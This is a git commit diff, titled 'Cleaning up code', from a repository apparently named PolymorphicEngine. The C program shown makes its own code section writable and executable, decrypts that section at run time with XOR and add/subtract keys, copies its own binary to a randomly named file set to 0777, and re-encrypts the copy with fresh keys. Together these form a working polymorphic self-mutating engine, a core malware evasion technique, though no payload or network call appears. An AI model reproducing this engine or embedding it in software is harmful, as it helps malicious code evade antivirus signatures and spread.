PolymorphicEngine
Barry Cleaning up code 5f6e3ab (3 years, 5 months ago)
diff --git a/src/main.c b/src/main.c
index ab676ef..4048b5d 100644
--- a/src/main.c
+++ b/src/main.c
@@ -14,51 +14,10 @@
#define POLYMORPHIC __attribute__((noinline, section(".polymorphic")))
-/* Linked values */
-extern unsigned char binaryStart[], polymorphicStart[], polymorphicEnd[];
-
/* Keys */
const uint8_t act[KEY_SIZE] = {}, /* Operators */
key[KEY_SIZE] = {}; /* Operands */
-
-/* Functions */
-int polymorphic_main(int argc, char **argv);
-
-/* Traditional main function */
-int
-main(int argc, char **argv)
-{
- size_t i, mask;
- void *aligned;
- uint8_t *code = (uint8_t *) polymorphicStart;
- long pageSize = sysconf(_SC_PAGESIZE);
-
- /* Make memory writable */
- if (pageSize <= 0)
- return 1;
- mask = pageSize - 1;
- aligned = (void *) ((size_t) code & ~mask);
- if (mprotect(aligned, (polymorphicEnd - polymorphicStart) + pageSize, PROT_READ|PROT_WRITE|PROT_EXEC))
- return 1;
-
- /* Decrypt our code */
- for (i = 0; i < (polymorphicEnd - polymorphicStart); i++) {
- switch (act[i % KEY_SIZE]) {
- case 0:
- code[i] ^= key[i % KEY_SIZE];
- break;
- case 1:
- code[i] -= key[i % KEY_SIZE];
- break;
- case 2:
- code[i] += key[i % KEY_SIZE];
- break;
- }
- }
-
- /* Run the decrypted code */
- return polymorphic_main(argc, argv);
-}
+extern uint8_t binaryStart[], polymorphicStart[], polymorphicEnd[];
/* Copy a file */
POLYMORPHIC
@@ -98,8 +57,9 @@ polymorphic_main(int argc, char **argv)
{
char filename[NAME_PREFIX_LENGTH + NAME_AFFIX_LENGTH + 1] = NAME_PREFIX,
/* Possible characters in filename */
- alpha[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
- uint8_t dKey[KEY_SIZE], dAct[KEY_SIZE], data, *code = (uint8_t *) polymorphicStart;
+ alpha[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ uint8_t dKey[KEY_SIZE], dAct[KEY_SIZE], data,
+ *code = (uint8_t *) polymorphicStart;
FILE *child;
size_t i;
@@ -107,8 +67,8 @@ polymorphic_main(int argc, char **argv)
srand(time(NULL));
/* Duplicate file */
- for (i = NAME_PREFIX_LENGTH; i < sizeof(filename)-1; i++)
- filename[i] = alpha[rand() % (sizeof(alpha)-1)];
+ for (i = NAME_PREFIX_LENGTH; i < sizeof(filename) - 1; i++)
+ filename[i] = alpha[rand() % (sizeof(alpha) - 1)];
copy_file(argv[0], filename);
chmod(filename, 0777);
@@ -129,7 +89,7 @@ polymorphic_main(int argc, char **argv)
fwrite(dKey, 1, KEY_SIZE, child);
/* Encrypt our code */
- fseek(child, (unsigned long int) (polymorphicStart - binaryStart), SEEK_SET);
+ fseek(child, (uint64_t) (polymorphicStart - binaryStart), SEEK_SET);
for (i = 0; i < (polymorphicEnd - polymorphicStart); i++) {
data = code[i];
switch (dAct[i % KEY_SIZE]) {
@@ -151,3 +111,39 @@ polymorphic_main(int argc, char **argv)
return 0;
}
+
+/* Traditional main function */
+int
+main(int argc, char **argv)
+{
+ size_t i, mask;
+ void *aligned;
+ uint8_t *code = (uint8_t *) polymorphicStart;
+ long pageSize = sysconf(_SC_PAGESIZE);
+
+ /* Make memory writable */
+ if (pageSize <= 0)
+ return 1;
+ mask = pageSize - 1;
+ aligned = (void *) ((size_t) code & ~mask);
+ i = (polymorphicEnd - polymorphicStart) + pageSize;
+ if (mprotect(aligned, i, PROT_READ|PROT_WRITE|PROT_EXEC))
+ return 1;
+
+ /* Decrypt our code */
+ for (i = 0; i < (polymorphicEnd - polymorphicStart); i++)
+ switch (act[i % KEY_SIZE]) {
+ case 0:
+ code[i] ^= key[i % KEY_SIZE];
+ break;
+ case 1:
+ code[i] -= key[i % KEY_SIZE];
+ break;
+ case 2:
+ code[i] += key[i % KEY_SIZE];
+ break;
+ }
+
+ /* Run the decrypted code */
+ return polymorphic_main(argc, argv);
+}